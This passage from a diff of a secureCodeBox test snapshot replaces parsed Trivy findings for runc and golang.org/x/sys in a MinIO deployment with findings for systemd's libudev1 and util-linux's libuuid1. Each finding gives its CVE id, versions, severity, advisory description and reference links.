+ "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0274", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43784", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.2", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29162", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8090", - "https://access.redhat.com/security/cve/CVE-2022-29162", - "https://bugzilla.redhat.com/2086398", - "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", - "https://errata.almalinux.org/9/ALSA-2022-8090.html", - "https://errata.rockylinux.org/RLSA-2022:8090", - "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", - "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", - "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", - "https://github.com/opencontainers/runc/releases/tag/v1.1.2", - "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", - "https://linux.oracle.com/cve/CVE-2022-29162.html", - "https://linux.oracle.com/errata/ELSA-2022-8090.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2022-29162", - "https://www.openwall.com/lists/oss-security/2022/05/12/1", - ], - }, - "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where \`runc exec --cap\` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes \`runc exec --cap\` behavior such that the additional capabilities granted to the process being executed (as specified via \`--cap\` arguments) do not include inheritable capabilities. In addition, \`runc spec\` is changed to not set any inheritable capabilities in the created example OCI spec (\`config.json\`) file.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "runc: incorrect handling of inheritable capabilities", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29162", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8090", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29162", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2086398", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8090.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8090", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", + "value": "https://bugzilla.redhat.com/2149063", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", + "value": "https://bugzilla.redhat.com/2155515", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29162.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8090.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0954", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", + "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", + "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29162", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/05/12/1", + "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", }, ], "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.5", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-28642", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2013-4392", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-28642", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", - "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", - "https://github.com/opencontainers/runc/pull/3785", - "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", - "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", - "https://ubuntu.com/security/notices/USN-6088-1", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2023-28642", + "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "https://access.redhat.com/security/cve/CVE-2013-4392", + "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "https://www.cve.org/CVERecord?id=CVE-2013-4392", ], }, "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. It was found that AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration. This issue has been fixed in runc version 1.1.5, by prohibiting symlinked \`/proc\`. See PR #3785 for details. users are advised to upgrade. Users unable to upgrade should avoid using an untrusted container image.", + "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration", + "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-28642", + "value": "https://avd.aquasec.com/nvd/cve-2013-4392", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-28642", + "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", + "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", + "value": "https://access.redhat.com/security/cve/CVE-2013-4392", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/pull/3785", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-1", - }, - { - "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-28642", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.5", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-25809", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-13529", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-25809", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", - "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", - "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", - "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", - "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", - "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", - "https://ubuntu.com/security/notices/USN-6088-1", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2023-25809", + "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "https://access.redhat.com/security/cve/CVE-2020-13529", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "https://linux.oracle.com/cve/CVE-2020-13529.html", + "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "https://security.gentoo.org/glsa/202107-48", + "https://security.netapp.com/advisory/ntap-20210625-0005/", + "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "https://ubuntu.com/security/notices/USN-5013-1", + "https://ubuntu.com/security/notices/USN-5013-2", + "https://www.cve.org/CVERecord?id=CVE-2020-13529", ], }, "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. In affected versions it was found that rootless runc makes \`/sys/fs/cgroup\` writable in following conditons: 1. when runc is executed inside the user namespace, and the \`config.json\` does not specify the cgroup namespace to be unshared (e.g.., \`(docker|podman|nerdctl) run --cgroupns=host\`, with Rootless Docker/Podman/nerdctl) or 2. when runc is executed outside the user namespace, and \`/sys\` is mounted with \`rbind, ro\` (e.g., \`runc spec --rootless\`; this condition is very rare). A container may gain the write access to user-owned cgroup hierarchy \`/sys/fs/cgroup/user.slice/...\` on the host . Other users's cgroup hierarchies are not affected. Users are advised to upgrade to version 1.1.5. Users unable to upgrade may unshare the cgroup namespace (\`(docker|podman|nerdctl) run --cgroupns=private)\`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts. or add \`/sys/fs/cgroup\` to \`maskedPaths\`.", + "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "Rootless runc makes \`/sys/fs/cgroup\` writable", + "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-25809", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-25809", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", - }, - { - "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", - }, - { - "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", - }, - { - "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", + "value": "https://avd.aquasec.com/nvd/cve-2020-13529", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", + "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-1", + "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-25809", + "value": "https://access.redhat.com/security/cve/CVE-2020-13529", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210817142637-7d9622a276b7", - "packageName": "golang.org/x/sys", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", - ], - }, - "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "faccessat checks wrong group", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", + "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://security.gentoo.org/glsa/202107-48", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://ubuntu.com/security/notices/USN-5013-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://ubuntu.com/security/notices/USN-5013-2", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31437", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://avd.aquasec.com/nvd/cve-2023-31437", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31438", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://avd.aquasec.com/nvd/cve-2023-31438", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://github.com/systemd/systemd/releases", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31439", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://github.com/kastel-security/Journald", + "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "https://github.com/systemd/systemd/releases", + ], + }, + "category": "Vulnerability", + "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://github.com/systemd/systemd/releases", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'opt/bitnami/common/bin/wait-for-port' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210510120138-977fb7262007", - "packageName": "golang.org/x/sys", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "libuuid1", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": 